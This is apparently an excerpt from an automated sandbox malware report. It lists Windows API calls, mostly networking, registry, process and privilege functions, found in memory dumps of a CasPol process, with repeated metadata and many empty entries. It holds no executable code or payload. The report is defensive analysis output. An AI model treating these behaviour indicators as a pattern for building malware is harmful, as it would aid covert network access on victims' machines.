                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: QueryValue
                                          • String ID:
                                          • API String ID: 3660427363-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetNetworkParams.IPHLPAPI(?,00000EA4,E552CEA1,00000000,00000000,00000000,00000000), ref: 1FE33124
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: NetworkParams
                                          • String ID:
                                          • API String ID: 2134775280-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetProcessTimes.KERNEL32(?,00000EA4,E552CEA1,00000000,00000000,00000000,00000000), ref: 1FE324DD
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: ProcessTimes
                                          • String ID:
                                          • API String ID: 1995159646-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • WSAEventSelect.WS2_32(?,00000EA4,E552CEA1,00000000,00000000,00000000,00000000), ref: 1FE3288A
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: EventSelect
                                          • String ID:
                                          • API String ID: 31538577-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • K32EnumProcessModules.KERNEL32(?,00000EA4,E552CEA1,00000000,00000000,00000000,00000000), ref: 1D45AD86
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6669280271.000000001D45A000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D45A000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1d45a000_CasPol.jbxd
                                          Similarity
                                          • API ID: EnumModulesProcess
                                          • String ID:
                                          • API String ID: 1082081703-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ReadFile.KERNEL32(?,00000EA4,E552CEA1,00000000,00000000,00000000,00000000), ref: 1FE309CD
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GlobalMemoryStatusEx.KERNEL32(?,E552CEA1,00000000,?,?,?,?,?,?,?,?,73793C68), ref: 1FE31638
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: GlobalMemoryStatus
                                          • String ID:
                                          • API String ID: 1890195054-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ioctlsocket.WS2_32(?,00000EA4,E552CEA1,00000000,00000000,00000000,00000000), ref: 1FE325C3
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: ioctlsocket
                                          • String ID:
                                          • API String ID: 3577187118-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • shutdown.WS2_32(?,00000EA4,E552CEA1,00000000,00000000,00000000,00000000), ref: 1FE32404
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: shutdown
                                          • String ID:
                                          • API String ID: 2510479042-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetAdaptersAddresses.IPHLPAPI(?,00000EA4,E552CEA1,00000000,00000000,00000000,00000000), ref: 1FE3364D
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: AdaptersAddresses
                                          • String ID:
                                          • API String ID: 2506852604-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: FindWindow
                                          • String ID:
                                          • API String ID: 134000473-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SetErrorMode.KERNEL32(?,E552CEA1,00000000,?,?,?,?,?,?,?,?,73793C68), ref: 1D45A4E8
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6669280271.000000001D45A000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D45A000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1d45a000_CasPol.jbxd
                                          Similarity
                                          • API ID: ErrorMode
                                          • String ID:
                                          • API String ID: 2340568224-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LoadLibraryA.KERNEL32(?,00000EA4), ref: 1D45BF27
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6669280271.000000001D45A000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D45A000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1d45a000_CasPol.jbxd
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID:
                                          • API String ID: 1029625771-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RasConnectionNotificationW.RASAPI32(?,00000EA4,E552CEA1,00000000,00000000,00000000,00000000), ref: 1FE32963
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: ConnectionNotification
                                          • String ID:
                                          • API String ID: 1402429939-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6669280271.000000001D45A000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D45A000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1d45a000_CasPol.jbxd
                                          Similarity
                                          • API ID: Initialize
                                          • String ID:
                                          • API String ID: 2538663250-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6669280271.000000001D45A000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D45A000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1d45a000_CasPol.jbxd
                                          Similarity
                                          • API ID: send
                                          • String ID:
                                          • API String ID: 2809346765-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetNetworkParams.IPHLPAPI(?,00000EA4,E552CEA1,00000000,00000000,00000000,00000000), ref: 1FE33124
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: NetworkParams
                                          • String ID:
                                          • API String ID: 2134775280-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 1D45A8E2
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6669280271.000000001D45A000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D45A000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1d45a000_CasPol.jbxd
                                          Similarity
                                          • API ID: LookupPrivilegeValue
                                          • String ID:
                                          • API String ID: 3899507212-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • FindClose.KERNEL32(?,E552CEA1,00000000,?,?,?,?,?,?,?,?,73793C68), ref: 1FE3074C
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: CloseFind
                                          • String ID:
                                          • API String ID: 1863332320-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetFileType.KERNEL32(?,00000EA4,E552CEA1,00000000,00000000,00000000,00000000), ref: 1FE30831
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: FileType
                                          • String ID:
                                          • API String ID: 3081899298-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 1FE3370E
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: Connect
                                          • String ID:
                                          • API String ID: 3144859779-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • K32GetModuleBaseNameW.KERNEL32(?,00000EA4,?,?), ref: 1D45AF82
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6669280271.000000001D45A000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D45A000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1d45a000_CasPol.jbxd
                                          Similarity
                                          • API ID: BaseModuleName
                                          • String ID:
                                          • API String ID: 595626670-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 1FE337CE
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: DuplicateHandle
                                          • String ID:
                                          • API String ID: 3793708945-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: FindWindow
                                          • String ID:
                                          • API String ID: 134000473-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RasEnumConnectionsW.RASAPI32(?,00000EA4,?,?), ref: 1FE318DA
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: ConnectionsEnum
                                          • String ID:
                                          • API String ID: 3832085198-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RegEnumKeyExW.KERNEL32(?,00000EA4,?,?), ref: 1FE313B6
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: Enum
                                          • String ID:
                                          • API String ID: 2928410991-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • setsockopt.WS2_32(?,?,?,?,?), ref: 1FE31A8C
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: setsockopt
                                          • String ID:
                                          • API String ID: 3981526788-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GlobalMemoryStatusEx.KERNEL32(?,E552CEA1,00000000,?,?,?,?,?,?,?,?,73793C68), ref: 1FE31638
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: GlobalMemoryStatus
                                          • String ID:
                                          • API String ID: 1890195054-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • FindCloseChangeNotification.KERNEL32(?,E552CEA1,00000000,?,?,?,?,?,?,?,?,73793C68), ref: 1D45A378
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6669280271.000000001D45A000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D45A000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1d45a000_CasPol.jbxd
                                          Similarity
                                          • API ID: ChangeCloseFindNotification
                                          • String ID:
                                          • API String ID: 2591292051-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RegQueryValueExW.KERNEL32(?,00000EA4,?,?), ref: 1D45A7BE
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6669280271.000000001D45A000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D45A000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1d45a000_CasPol.jbxd
                                          Similarity
                                          • API ID: QueryValue
                                          • String ID:
                                          • API String ID: 3660427363-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • FindCloseChangeNotification.KERNEL32(?,E552CEA1,00000000,?,?,?,?,?,?,?,?,73793C68), ref: 1D45ABB8
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6669280271.000000001D45A000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D45A000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1d45a000_CasPol.jbxd
                                          Similarity
                                          • API ID: ChangeCloseFindNotification
                                          • String ID:
                                          • API String ID: 2591292051-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • MkParseDisplayName.OLE32(?,00000EA4,?,?), ref: 1D45B3E6
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6669280271.000000001D45A000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D45A000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1d45a000_CasPol.jbxd
                                          Similarity
                                          • API ID: DisplayNameParse
                                          • String ID:
                                          • API String ID: 3580041360-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6669280271.000000001D45A000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D45A000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1d45a000_CasPol.jbxd
                                          Similarity
                                          • API ID: send
                                          • String ID:
                                          • API String ID: 2809346765-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • FindClose.KERNEL32(?,E552CEA1,00000000,?,?,?,?,?,?,?,?,73793C68), ref: 1FE3074C
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: CloseFind
                                          • String ID:
                                          • API String ID: 1863332320-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6669280271.000000001D45A000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D45A000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1d45a000_CasPol.jbxd
                                          Similarity
                                          • API ID: Initialize
                                          • String ID:
                                          • API String ID: 2538663250-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SetErrorMode.KERNEL32(?,E552CEA1,00000000,?,?,?,?,?,?,?,?,73793C68), ref: 1D45A4E8
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6669280271.000000001D45A000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D45A000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1d45a000_CasPol.jbxd
                                          Similarity
                                          • API ID: ErrorMode
                                          • String ID:
                                          • API String ID: 2340568224-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6646838713.0000000000D90000.00000040.00000400.00020000.00000000.sdmp, Offset: 00D90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_d90000_CasPol.jbxd
                                          Similarity
                                          • API ID: TerminateThread
                                          • String ID:
                                          • API String ID: 1852365436-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6645954165.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cc0000_CasPol.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: d]r
                                          • API String ID: 0-2980756583
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6645954165.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cc0000_CasPol.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: d]r
                                          • API String ID: 0-2980756583
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6645954165.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cc0000_CasPol.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6645954165.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cc0000_CasPol.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6645954165.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cc0000_CasPol.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6645954165.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cc0000_CasPol.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6645954165.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cc0000_CasPol.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6645954165.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cc0000_CasPol.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6645954165.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cc0000_CasPol.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6645954165.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cc0000_CasPol.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6645954165.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cc0000_CasPol.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6645954165.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cc0000_CasPol.jbxd
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6645954165.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cc0000_CasPol.jbxd
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6645954165.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cc0000_CasPol.jbxd
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6645954165.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cc0000_CasPol.jbxd
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6645954165.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cc0000_CasPol.jbxd
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6645954165.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cc0000_CasPol.jbxd
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6645954165.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cc0000_CasPol.jbxd
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6645954165.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cc0000_CasPol.jbxd
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6645954165.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cc0000_CasPol.jbxd
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6645954165.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cc0000_CasPol.jbxd
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6645954165.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cc0000_CasPol.jbxd
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6645954165.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cc0000_CasPol.jbxd
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6645954165.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cc0000_CasPol.jbxd
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6645954165.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cc0000_CasPol.jbxd
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6645954165.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cc0000_CasPol.jbxd
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6696999493.000000001FCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FCD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fcd0000_CasPol.jbxd
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6645954165.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cc0000_CasPol.jbxd
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6671124542.000000001D5F0000.00000040.00000020.00020000.00000000.sdmp, Offset: 1D5F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1d5f0000_CasPol.jbxd
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
